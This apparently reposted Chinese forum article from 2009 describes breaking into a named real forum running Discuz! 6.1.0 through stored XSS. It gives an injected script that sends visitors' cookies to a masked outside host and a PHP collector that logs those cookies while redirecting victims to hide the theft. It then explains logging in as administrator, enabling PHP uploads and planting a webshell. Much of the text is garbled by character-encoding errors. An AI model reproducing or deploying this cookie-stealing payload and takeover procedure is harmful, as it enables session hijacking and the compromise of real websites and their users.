利用XSS滲透DISCUZ 6.1.0實(shí)戰(zhàn)

發(fā)布時(shí)間：2009-04-18 12:25:55 作者：佚名

網(wǎng)上關(guān)于XSS入侵網(wǎng)站的例子很多，但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來(lái)親自介紹下利用腳本入侵國(guó)內(nèi)某安全論壇的過(guò)程就像主題所說(shuō)一樣，今天測(cè)試的論壇是DISCUZ！ 6.1.0 目標(biāo)：卡巴技術(shù)論壇 http://kpc

網(wǎng)上關(guān)于XSS入侵網(wǎng)站的例子很多，但是大多都是一些惡作劇性質(zhì)的介紹.下面本人來(lái)親自介紹下利用腳本入侵國(guó)內(nèi)某安全論壇的過(guò)程
就像主題所說(shuō)一樣，今天測(cè)試的論壇是DISCUZ！ 6.1.0

目標(biāo)：卡巴技術(shù)論壇 http://kpchina.net http://bbs.kpchina.net
工具：無(wú)（感覺(jué)本人的入侵方式不是很高級(jí)，低調(diào)，所以不用工具，需要的東西自己寫，都是腳本哦~！o(∩_∩)o...）

下面開(kāi)始入侵：
XSS(Cross Site Scripting)攻擊，想要獲得權(quán)限就要找漏洞，大家都是知道，DISCUZ！ 6.1.0 論壇有XSS漏洞，這是前人的經(jīng)驗(yàn)，我不邀功

很多人只是知道有XSS漏洞可以加個(gè)alert之類的標(biāo)記，但是都屬于惡作劇的范疇，實(shí)用戰(zhàn)術(shù)才是抓住入侵的關(guān)鍵，讓那些大意的編程人員和系統(tǒng)管理員能夠提高安全意識(shí)。真正具有威脅性的XSS攻擊方式就是那就是網(wǎng)上提到的竊取Cookie，Cookie是保存在本機(jī)臨時(shí)目錄，記錄本機(jī)帳戶登錄網(wǎng)站的帳戶信息，竊取它，并不能看到被竊取人的帳號(hào)和密碼，有人會(huì)問(wèn)，那有什么用，我們要的只是Cookie文件，只要把具有相應(yīng)網(wǎng)站權(quán)限帳號(hào)的Cookie拷貝到入侵者自己機(jī)器的臨時(shí)目錄下，覆蓋刷新那個(gè)網(wǎng)站，就能自動(dòng)登錄進(jìn)去，獲得其站點(diǎn)權(quán)限。

上面說(shuō)的是思路，下面說(shuō)下如何活動(dòng)卡巴論壇的管理權(quán)限

要獲得卡巴技術(shù)論壇的管理員帳號(hào)的Cookie，就要在論壇里注入獲得帳號(hào)Cookie的js腳本，將Cookie以post方式提交給入侵者

如圖：

論壇——>入侵者布置的跨站攻擊——>轉(zhuǎn)移被入侵這視線（隱蔽）

論壇插入腳本：

var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

但是我不一樣，因?yàn)樗枰T導(dǎo)人去點(diǎn)擊他的鏈接，但是現(xiàn)在人不是傻子，不會(huì)輕易點(diǎn)你的鏈接。而我是要把腳步插入論壇頁(yè)面中，這樣既隱蔽又省去了誘導(dǎo)的力氣
我插入的腳本如下：

**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script>
**********************************************************************************************

跨站攻擊腳本：
reg.php

************************************************************************************
<?php
if (isset($_GET['var'])) {
file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var']));
}
?>

<script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //轉(zhuǎn)移頁(yè)面隱蔽上面記錄cookie的操作

************************************************************************************

剩下的步驟就是等著魚(yú)自己上鉤了

當(dāng)管理員帳號(hào)點(diǎn)入論壇某個(gè)頁(yè)面時(shí)，這個(gè)頁(yè)面卻被轉(zhuǎn)到了某新聞網(wǎng)站，其實(shí)不知，他的cookie已經(jīng)被記錄

拿這個(gè)cookie登錄論壇，（刪東西不推薦哦~~），可以臨時(shí)開(kāi)啟上傳php文件，例如phpwebshell，然后再關(guān)閉，這樣你就可以很輕松的操控整個(gè)論壇站點(diǎn)

為什么選擇此論壇做入侵講解，很簡(jiǎn)單，這個(gè)論壇具備了多個(gè)漏洞：
一、論壇有XSS漏洞，沒(méi)有對(duì)輸入輸出做過(guò)濾
二、論壇采用cookie方式記錄用戶信息
三、對(duì)論壇上某個(gè)版主看不慣，有點(diǎn)權(quán)利亂封號(hào)，不過(guò)，畢竟論壇不是那個(gè)人的，還是對(duì)管理員手下留情吧（做人要厚道！）